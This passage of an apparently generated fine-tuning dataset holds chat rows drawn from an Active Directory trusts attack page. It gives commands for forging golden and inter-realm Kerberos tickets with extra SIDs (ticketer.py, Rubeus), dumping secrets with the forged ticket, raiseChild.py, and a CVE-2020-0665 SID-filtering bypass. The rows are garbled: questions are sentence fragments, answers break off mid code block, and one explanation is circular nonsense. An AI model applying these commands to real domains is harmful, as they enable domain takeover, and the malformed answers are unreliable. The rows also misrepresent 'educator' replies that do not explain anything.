for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Generate golden ticket with extra SID?", "response": "ticketer.py -nthash \"compromised_domain_krbtgt_NT_hash\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" \"someusername\"", "metadata": {"corpus_index": 1149, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is The ticket can be used directly with any tool supporting Kerberos auth?"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" secretsdump.py -k -no-pass \"compromised_domain_FQDN/someusername@domain_controller\"\n``\n\nImpacket's raiseChild.py script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:\n\n`bash\nraiseChild.py \"compromised_domain\"/\"compromised_domain_admin\":\"$PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is The ticket can be used directly with any tool supporting Kerberos auth?", "response": "KRB5CCNAME=\"someusername.ccache\" secretsdump.py -k -no-pass \"compromised_domain_FQDN/someusername@domain_controller\"\n``\n\nImpacket's raiseChild.py script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:\n\n`bash\nraiseChild.py \"compromised_domain\"/\"compromised_domain_admin\":\"$PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell", "metadata": {"corpus_index": 1150, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for The ticket can be used directly with any tool supporting Kerberos auth"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" secretsdump.py -k -no-pass \"compromised_domain_FQDN/someusername@domain_controller\"\n``\n\nImpacket's raiseChild.py script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:\n\n`bash\nraiseChild.py \"compromised_domain\"/\"compromised_domain_admin\":\"$PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for The ticket can be used directly with any tool supporting Kerberos auth", "response": "KRB5CCNAME=\"someusername.ccache\" secretsdump.py -k -no-pass \"compromised_domain_FQDN/someusername@domain_controller\"\n``\n\nImpacket's raiseChild.py script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:\n\n`bash\nraiseChild.py \"compromised_domain\"/\"compromised_domain_admin\":\"$PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell", "metadata": {"corpus_index": 1150, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do The ticket can be used directly with any tool supporting Kerberos auth"}, {"role": "assistant", "content": "Impacket's [raiseChild.py](https://github.com/fortra/impacket/blob/master/examples/raiseChild.py) script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do The ticket can be used directly with any tool supporting Kerberos auth", "response": "Impacket's [raiseChild.py](https://github.com/fortra/impacket/blob/master/examples/raiseChild.py) script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:", "metadata": {"corpus_index": 1151, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Impacket's [raiseChild.py](https://github.com/fortra/impacket/blob/master/examples/raiseChild.py) script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:`?"}, {"role": "assistant", "content": "This command is used for the ticket can be used directly with any tool supporting kerberos auth. The ticket can be used directly with any tool supporting Kerberos auth"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Impacket's [raiseChild.py](https://github.com/fortra/impacket/blob/master/examples/raiseChild.py) script can also be used to conduct the golden ticket technique automatically when SID filtering is disabled:`?", "response": "This command is used for the ticket can be used directly with any tool supporting kerberos auth. The ticket can be used directly with any tool supporting Kerberos auth", "metadata": {"corpus_index": 1151, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Generate golden ticket with extra SID and use Pass-the-Ticket?"}, {"role": "assistant", "content": "Rubeus.exe golden /user:Administrator /domain: /sid: /sids:- /krbtgt: /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Generate golden ticket with extra SID and use Pass-the-Ticket?", "response": "Rubeus.exe golden /user:Administrator /domain: /sid: /sids:- /krbtgt: /ptt", "metadata": {"corpus_index": 1152, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Generate golden ticket with extra SID and use Pass-the-Ticket?"}, {"role": "assistant", "content": "Rubeus.exe golden /user:Administrator /domain: /sid: /sids:- /krbtgt: /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Generate golden ticket with extra SID and use Pass-the-Ticket?", "response": "Rubeus.exe golden /user:Administrator /domain: /sid: /sids:- /krbtgt: /ptt", "metadata": {"corpus_index": 1152, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - 🛠️ SID filtering bypass"}, {"role": "assistant", "content": "> a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n>\n> _(__SID filtering_ _theory)_\n\n_//_ _https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research_"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - 🛠️ SID filtering bypass", "response": "> a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n>\n> _(__SID filtering_ _theory)_\n\n_//_ _https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research_", "metadata": {"corpus_index": 1153, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Trusts - 🛠️ SID filtering bypass"}, {"role": "assistant", "content": "> a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n>\n> _(__SID filtering_ _theory)_\n\n_//_ _https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research_"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Trusts - 🛠️ SID filtering bypass", "response": "> a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n>\n> _(__SID filtering_ _theory)_\n\n_//_ _https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research_", "metadata": {"corpus_index": 1153, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Trusts - CVE-2020-0665"}, {"role": "assistant", "content": "The idea behind CVE-2020-0665 is to bypass SID filtering to authenticate as a server in the trusting forest targeting the local admin on this server (RID = 500). To do so, the local domain SID of the server is spoofed to \"fake\" a child domain in the trusted forest, which will be added to the list of trusted SIDs in the trusting forest domain's TDO (Trusted Domain Object) after 24 hours (see SID filtering). An inter-realm/referral ticket will then be forged using the spoofed SID as extended SID which will be used to request a service ticket to that server (see Forging tickets).\n\nThe attack is conducted as follows:\n\n1. Get the local domain's SID of the target server. This step requires Windows older than Windows 10 build 1607, or before Server 2016, as it uses MS-LSAT RPC to query the target server for the SID of its local domain, that is restricted on newer versions and requires administrative privileges on the target.\n2. Spoof the local domain's SID of the target server. This steps must be run as SYSTEM on the trusted forest's domain controller. The Frida script used for this step is made for Windows Server 2016 version 1607. If the target runs a different version, the address offset might be different and some additional preparation must be done.\n3. Forging tickets. For this step, refer to Kerberos authentication theory chapter for more details about the trust key being used, the ticket forgery is then highly similar to the Forging tickets practice part.\n\n> [!TIP]\n> For more details about how this attack works under the hood, refer to the article on dirkjanm.io by Dirk-jan Mollema.\n\n> [!WARNING]\n> Some considerations to reproduce the attack:\n> \n> * Full control over the trusted forest is assumed.\n> * Information that flows over to the trusting forest can be modified.\n> * There is at least one server joined to a domain in the trusting forest (referred to as the \"target server\" here).\n\nThe attack can be conducted with Dirk-jan Mollema's forest trust tools."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Trusts - CVE-2020-0665", "response": "The idea behind CVE-2020-0665 is to bypass SID filtering to authenticate as a server in the trusting forest targeting the local admin on this server (RID = 500). To do so, the local domain SID of the server is spoofed to \"fake\" a child domain in the trusted forest, which will be added to the list of trusted SIDs in the trusting forest domain's TDO (Trusted Domain Object) after 24 hours (see SID filtering). An inter-realm/referral ticket will then be forged using the spoofed SID as extended SID which will be used to request a service ticket to that server (see Forging tickets).\n\nThe attack is conducted as follows:\n\n1. Get the local domain's SID of the target server. This step requires Windows older than Windows 10 build 1607, or before Server 2016, as it uses MS-LSAT RPC to query the target server for the SID of its local domain, that is restricted on newer versions and requires administrative privileges on the target.\n2. Spoof the local domain's SID of the target server. This steps must be run as SYSTEM on the trusted forest's domain controller. The Frida script used for this step is made for Windows Server 2016 version 1607. If the target runs a different version, the address offset might be different and some additional preparation must be done.\n3. Forging tickets. For this step, refer to Kerberos authentication theory chapter for more details about the trust key being used, the ticket forgery is then highly similar to the Forging tickets practice part.\n\n> [!TIP]\n> For more details about how this attack works under the hood, refer to the article on dirkjanm.io by Dirk-jan Mollema.\n\n> [!WARNING]\n> Some considerations to reproduce the attack:\n> \n> * Full control over the trusted forest is assumed.\n> * Information that flows over to the trusting forest can be modified.\n> * There is at least one server joined to a domain in the trusting forest (referred to as the \"target server\" here).\n\nThe attack can be conducted with Dirk-jan Mollema's forest trust tools.", "metadata": {"corpus_index": 1154, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Trusts - CVE-2020-0665"}, {"role": "assistant", "content": "The idea behind CVE-2020-0665 is to bypass SID filtering to authenticate as a server in the trusting forest targeting the local admin on this server (RID = 500). To do so, the local domain SID of the server is spoofed to \"fake\" a child domain in the trusted forest, which will be added to the list of trusted SIDs in the trusting forest domain's TDO (Trusted Domain Object) after 24 hours (see SID filtering). An inter-realm/referral ticket will then be forged using the spoofed SID as extended SID which will be used to request a service ticket to that server (see Forging tickets).\n\nThe attack is conducted as follows:\n\n1. Get the local domain's SID of the target server. This step requires Windows older than Windows 10 build 1607, or before Server 2016, as it uses MS-LSAT RPC to query the target server for the SID of its local domain, that is restricted on newer versions and requires administrative privileges on the target.\n2. Spoof the local domain's SID of the target server. This steps must be run as SYSTEM on the trusted forest's domain controller. The Frida script used for this step is made for Windows Server 2016 version 1607. If the target runs a different version, the address offset might be different and some additional preparation must be done.\n3. Forging tickets. For this step, refer to Kerberos authentication theory chapter for more details about the trust key being used, the ticket forgery is then highly similar to the Forging tickets practice part.\n\n> [!TIP]\n> For more details about how this attack works under the hood, refer to the article on dirkjanm.io by Dirk-jan Mollema.\n\n> [!WARNING]\n> Some considerations to reproduce the attack:\n> \n> * Full control over the trusted forest is assumed.\n> * Information that flows over to the trusting forest can be modified.\n> * There is at least one server joined to a domain in the trusting forest (referred to as the \"target server\" here).\n\nThe attack can be conducted with Dirk-jan Mollema's forest trust tools."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Trusts - CVE-2020-0665", "response": "The idea behind CVE-2020-0665 is to bypass SID filtering to authenticate as a server in the trusting forest targeting the local admin on this server (RID = 500). To do so, the local domain SID of the server is spoofed to \"fake\" a child domain in the trusted forest, which will be added to the list of trusted SIDs in the trusting forest domain's TDO (Trusted Domain Object) after 24 hours (see SID filtering). An inter-realm/referral ticket will then be forged using the spoofed SID as extended SID which will be used to request a service ticket to that server (see Forging tickets).\n\nThe attack is conducted as follows:\n\n1. Get the local domain's SID of the target server. This step requires Windows older than Windows 10 build 1607, or before Server 2016, as it uses MS-LSAT RPC to query the target server for the SID of its local domain, that is restricted on newer versions and requires administrative privileges on the target.\n2. Spoof the local domain's SID of the target server. This steps must be run as SYSTEM on the trusted forest's domain controller. The Frida script used for this step is made for Windows Server 2016 version 1607. If the target runs a different version, the address offset might be different and some additional preparation must be done.\n3. Forging tickets. For this step, refer to Kerberos authentication theory chapter for more details about the trust key being used, the ticket forgery is then highly similar to the Forging tickets practice part.\n\n> [!TIP]\n> For more details about how this attack works under the hood, refer to the article on dirkjanm.io by Dirk-jan Mollema.\n\n> [!WARNING]\n> Some considerations to reproduce the attack:\n> \n> * Full control over the trusted forest is assumed.\n> * Information that flows over to the trusting forest can be modified.\n> * There is at least one server joined to a domain in the trusting forest (referred to as the \"target server\" here).\n\nThe attack can be conducted with Dirk-jan Mollema's forest trust tools.", "metadata": {"corpus_index": 1154, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about The hostname (Security Principal Name) of the target server is required?"}, {"role": "assistant", "content": "getlocalsid.py \"trusted_domain\"/\"someusername\"@\"\" \"target_server_NETBIOS_name\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about The hostname (Security Principal Name) of the target server is required?", "response": "getlocalsid.py \"trusted_domain\"/\"someusername\"@\"\" \"target_server_NETBIOS_name\"\n```", "metadata": {"corpus_index": 1155, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for The hostname (Security Principal Name) of the target server is required"}, {"role": "assistant", "content": "getlocalsid.py \"trusted_domain\"/\"someusername\"@\"\" \"target_server_NETBIOS_name\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for The hostname (Security Principal Name) of the target server is required", "response": "getlocalsid.py \"trusted_domain\"/\"someusername\"@\"\" \"target_server_NETBIOS_name\"\n```", "metadata": {"corpus_index": 1155, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 1. Forge an inter-realm/referral ticket with the spoofed SID put as extended SID with RID 500 using the AES key of the incoming trust?"}, {"role": "assistant", "content": "ticketer.py -aesKey \"AES_key_of_incoming_trust\" -domain \"trusted_target_domain_FQDN\" -domain-sid \"trusted_target_domain_SID\" -user-id 1000 -groups 513 -extra-sid \"\"-500 -spn \"krbtgt/trusting_target_domain_FQDN\" \"someusername\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 1. Forge an inter-realm/referral ticket with the spoofed SID put as extended SID with RID 500 using the AES key of the incoming trust?", "response": "ticketer.py -aesKey \"AES_key_of_incoming_trust\" -domain \"trusted_target_domain_FQDN\" -domain-sid \"trusted_target_domain_SID\" -user-id 1000 -groups 513 -extra-sid \"\"-500 -spn \"krbtgt/trusting_target_domain_FQDN\" \"someusername\"", "metadata": {"corpus_index": 1156, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 1. Forge an inter-realm/referral ticket with the spoofed SID put as extended SID with RID 500 using the AES key of the incoming trust"}, {"role": "assistant", "content": "ticketer.py -aesKey \"AES_key_of_incoming_trust\" -domain \"trusted_target_domain_FQDN\" -domain-sid \"trusted_target_domain_SID\" -user-id 1000 -groups 513 -extra-sid \"\"-500 -spn \"krbtgt/trusting_target_domain_FQDN\" \"someusername\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 1. Forge an inter-realm/referral ticket with the spoofed SID put as extended SID with RID 500 using the AES key of the incoming trust", "response": "ticketer.py -aesKey \"AES_key_of_incoming_trust\" -domain \"trusted_target_domain_FQDN\" -domain-sid \"trusted_target_domain_SID\" -user-id 1000 -groups 513 -extra-sid \"\"-500 -spn \"krbtgt/trusting_target_domain_FQDN\" \"someusername\"", "metadata": {"corpus_index": 1156, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Notice that keys has to be manually modified in the getftST.py script before in the context of penetration testing"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" getftST.py -spn \"CIFS/target_server_FQDN\" -target-domain \"trusting_target_domain_FQDN\" -via-domain \"trusted_target_domain_FQDN\" \"domain/username\" -dc-ip \"target_DC_IP\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Notice that keys has to be manually modified in the getftST.py script before in the context of penetration testing", "response": "KRB5CCNAME=\"someusername.ccache\" getftST.py -spn \"CIFS/target_server_FQDN\" -target-domain \"trusting_target_domain_FQDN\" -via-domain \"trusted_target_domain_FQDN\" \"domain/username\" -dc-ip \"target_DC_IP\"", "metadata": {"corpus_index": 1157, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Notice that keys has to be manually modified in the getftST.py script before"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" getftST.py -spn \"CIFS/target_server_FQDN\" -target-domain \"trusting_target_domain_FQDN\" -via-domain \"trusted_target_domain_FQDN\" \"domain/username\" -dc-ip \"target_DC_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Notice that keys has to be manually modified in the getftST.py script before", "response": "KRB5CCNAME=\"someusername.ccache\" getftST.py -spn \"CIFS/target_server_FQDN\" -target-domain \"trusting_target_domain_FQDN\" -via-domain \"trusted_target_domain_FQDN\" \"domain/username\" -dc-ip \"target_DC_IP\"", "metadata": {"corpus_index": 1157, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 3. Use the obtained ST to access the target server as local admin"}, {"role": "assistant", "content": "KRB5CCNAME=username.ccache smbclient.py -k \"trusted_domain\"/\"someusername\"@\"target_server_FQDN\" -no-pass\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 3. Use the obtained ST to access the target server as local admin", "response": "KRB5CCNAME=username.ccache smbclient.py -k \"trusted_domain\"/\"someusername\"@\"target_server_FQDN\" -no-pass\n```", "metadata": {"corpus_index": 1158, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 3. Use the obtained ST to access the target server as local admin?"}, {"role": "assistant", "content": "KRB5CCNAME=username.ccache smbclient.py -k \"trusted_domain\"/\"someusername\"@\"target_server_FQDN\" -no-pass\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 3. Use the obtained ST to access the target server as local admin?", "response": "KRB5CCNAME=username.ccache smbclient.py -k \"trusted_domain\"/\"someusername\"@\"target_server_FQDN\" -no-pass\n```", "metadata": {"corpus_index": 1158, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Trusts - 🛠️ Keys container trust"}, {"role": "assistant", "content": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\n// Enterprise Domain Controllers have GenericAll on Keys container (CN=keys,DN=domain,DN=local), \"Default container for key credential objects\", used for gMSA ?\n\n// Container should be empty, but if it's not, exploitable seulement s'il y a déjà des objets dans le conteneur ce qui n'est pas censé être le cas par défaut."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Trusts - 🛠️ Keys container trust", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\n// Enterprise Domain Controllers have GenericAll on Keys container (CN=keys,DN=domain,DN=local), \"Default container for key credential objects\", used for gMSA ?\n\n// Container should be empty, but if it's not, exploitable seulement s'il y a déjà des objets dans le conteneur ce qui n'est pas censé être le cas par défaut.", "metadata": {"corpus_index": 1159, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Trusts - 🛠️ Keys container trust"}, {"role": "assistant", "content": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\n// Enterprise Domain Controllers have GenericAll on Keys container (CN=keys,DN=domain,DN=local), \"Default container for key credential objects\", used for gMSA ?\n\n// Container should be empty, but if it's not, exploitable seulement s'il y a déjà des objets dans le conteneur ce qui n'est pas censé être le cas par défaut."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Trusts - 🛠️ Keys container trust", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\n// Enterprise Domain Controllers have GenericAll on Keys container (CN=keys,DN=domain,DN=local), \"Default container for key credential objects\", used for gMSA ?\n\n// Container should be empty, but if it's not, exploitable seulement s'il y a déjà des objets dans le conteneur ce qui n'est pas censé être le cas par défaut.", "metadata": {"corpus_index": 1159, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - 🛠️ DNS trust"}, {"role": "assistant", "content": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - 🛠️ DNS trust", "response": "// https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research", "metadata": {"corpus_index": 1160, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Trusts - 🛠️ DNS trust?"}, {"role": "assistant", "content": "// 